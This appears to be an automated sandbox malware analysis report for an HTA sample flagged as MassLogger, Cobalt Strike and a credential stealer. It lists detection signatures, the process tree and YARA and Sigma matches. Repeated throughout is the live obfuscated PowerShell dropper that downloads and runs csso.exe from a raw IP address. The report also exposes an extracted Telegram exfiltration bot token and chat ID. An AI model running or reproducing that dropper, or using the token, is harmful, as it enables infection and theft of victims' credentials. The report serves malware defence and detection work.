Edit tour

Windows Analysis Report
efs.hta

Overview

General Information

Sample name:	efs.hta
Analysis ID:	1636932
MD5:	2bd36a058624c4c3357556f3fe02bcec
SHA1:	83a0f59b88b607c950051525cc5fc1dbfe8ed2e2
SHA256:	7a6fd46328e6a0d7c0a4f366b1ea2b636999aeac664dc31f7753b6e1b2be0d1a
Tags:	htauser-lowmal3
Infos:

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Detected Cobalt Strike Beacon

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected MSIL Logger

Yara detected MassLogger RAT

Yara detected Powershell decode and execute

Yara detected Telegram RAT

.NET source code references suspicious native API functions

Binary is likely a compiled AutoIt script file

Contains functionality to log keystrokes (.Net Source)

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Suspicious MSHTA Child Process

Suspicious command line found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6236 cmdline: mshta.exe "C:\Users\user\Desktop\efs.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 3880 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6860 cmdline: POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 1792 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 7100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1ED.tmp" "c:\Users\user\AppData\Local\Temp\lphx2jer\CSC5DB36CC8F4B54EA59350C64E5EA82CD5.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

csso.exe (PID: 7504 cmdline: "C:\Users\user\AppData\Roaming\csso.exe" MD5: 855BB87420F8DBE945A1FFA4ABBB23F9)

RegSvcs.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Roaming\csso.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1df:$a1: get_encryptedPassword 0xf507:$a2: get_encryptedUsername 0xef7a:$a3: get_timePasswordChanged 0xf09b:$a4: get_passwordField 0xf1f5:$a5: set_encryptedPassword 0x10b51:$a7: get_logins 0x10802:$a8: GetOutlookPasswords 0x105f4:$a9: StartKeylogger 0x10aa1:$a10: KeyLoggerEventArgs 0x10651:$a11: KeyLoggerEventArgsEventHandler
0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1418b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13689:$a3: \Google\Chrome\User Data\Default\Login Data 0x13997:$a4: \Orbitum\User Data\Default\Login Data 0x1478f:$a5: \Kometa\User Data\Default\Login Data
0000000D.00000002.2438663867.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000D.00000002.2438663867.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2438663867.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0000000D.00000002.2438663867.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.2438663867.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xefdf:$a1: get_encryptedPassword 0xf307:$a2: get_encryptedUsername 0xed7a:$a3: get_timePasswordChanged 0xee9b:$a4: get_passwordField 0xeff5:$a5: set_encryptedPassword 0x10951:$a7: get_logins 0x10602:$a8: GetOutlookPasswords 0x103f4:$a9: StartKeylogger 0x108a1:$a10: KeyLoggerEventArgs 0x10451:$a11: KeyLoggerEventArgsEventHandler
0000000D.00000002.2442267821.0000000003459000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: csso.exe PID: 7504	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: csso.exe PID: 7504	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: csso.exe PID: 7504	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: csso.exe PID: 7504	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: csso.exe PID: 7504	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe917c:$a1: get_encryptedPassword 0xe9495:$a2: get_encryptedUsername 0xe8f2b:$a3: get_timePasswordChanged 0xe904c:$a4: get_passwordField 0xe9192:$a5: set_encryptedPassword 0xeaa95:$a7: get_logins 0xea746:$a8: GetOutlookPasswords 0xea538:$a9: StartKeylogger 0xea9e5:$a10: KeyLoggerEventArgs 0xea595:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7532	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7532	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7532	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7532	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4d2dc:$a1: get_encryptedPassword 0x4d5f5:$a2: get_encryptedUsername 0x4d08b:$a3: get_timePasswordChanged 0x4d1ac:$a4: get_passwordField 0x4d2f2:$a5: set_encryptedPassword 0x4ebf5:$a7: get_logins 0x4e8a6:$a8: GetOutlookPasswords 0x4e698:$a9: StartKeylogger 0x4eb45:$a10: KeyLoggerEventArgs 0x4e6f5:$a11: KeyLoggerEventArgsEventHandler
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.csso.exe.3cb0000.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
12.2.csso.exe.3cb0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.csso.exe.3cb0000.1.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
12.2.csso.exe.3cb0000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.csso.exe.3cb0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1df:$a1: get_encryptedPassword 0xf507:$a2: get_encryptedUsername 0xef7a:$a3: get_timePasswordChanged 0xf09b:$a4: get_passwordField 0xf1f5:$a5: set_encryptedPassword 0x10b51:$a7: get_logins 0x10802:$a8: GetOutlookPasswords 0x105f4:$a9: StartKeylogger 0x10aa1:$a10: KeyLoggerEventArgs 0x10651:$a11: KeyLoggerEventArgsEventHandler
12.2.csso.exe.3cb0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1418b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13689:$a3: \Google\Chrome\User Data\Default\Login Data 0x13997:$a4: \Orbitum\User Data\Default\Login Data 0x1478f:$a5: \Kometa\User Data\Default\Login Data
13.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
13.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
13.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1df:$a1: get_encryptedPassword 0xf507:$a2: get_encryptedUsername 0xef7a:$a3: get_timePasswordChanged 0xf09b:$a4: get_passwordField 0xf1f5:$a5: set_encryptedPassword 0x10b51:$a7: get_logins 0x10802:$a8: GetOutlookPasswords 0x105f4:$a9: StartKeylogger 0x10aa1:$a10: KeyLoggerEventArgs 0x10651:$a11: KeyLoggerEventArgsEventHandler
13.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1418b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13689:$a3: \Google\Chrome\User Data\Default\Login Data 0x13997:$a4: \Orbitum\User Data\Default\Login Data 0x1478f:$a5: \Kometa\User Data\Default\Login Data
12.2.csso.exe.3cb0000.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
12.2.csso.exe.3cb0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.csso.exe.3cb0000.1.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
12.2.csso.exe.3cb0000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.csso.exe.3cb0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3df:$a1: get_encryptedPassword 0xd707:$a2: get_encryptedUsername 0xd17a:$a3: get_timePasswordChanged 0xd29b:$a4: get_passwordField 0xd3f5:$a5: set_encryptedPassword 0xed51:$a7: get_logins 0xea02:$a8: GetOutlookPasswords 0xe7f4:$a9: StartKeylogger 0xeca1:$a10: KeyLoggerEventArgs 0xe851:$a11: KeyLoggerEventArgsEventHandler
12.2.csso.exe.3cb0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1238b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11889:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b97:$a4: \Orbitum\User Data\Default\Login Data 0x1298f:$a5: \Kometa\User Data\Default\Login Data
Click to see the 13 entries

Other

Source	Rule	Description	Author	Strings
amsi32_6860.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6860, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.cmdline", ProcessId: 1792, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6860, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6860, TargetFilename: C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAg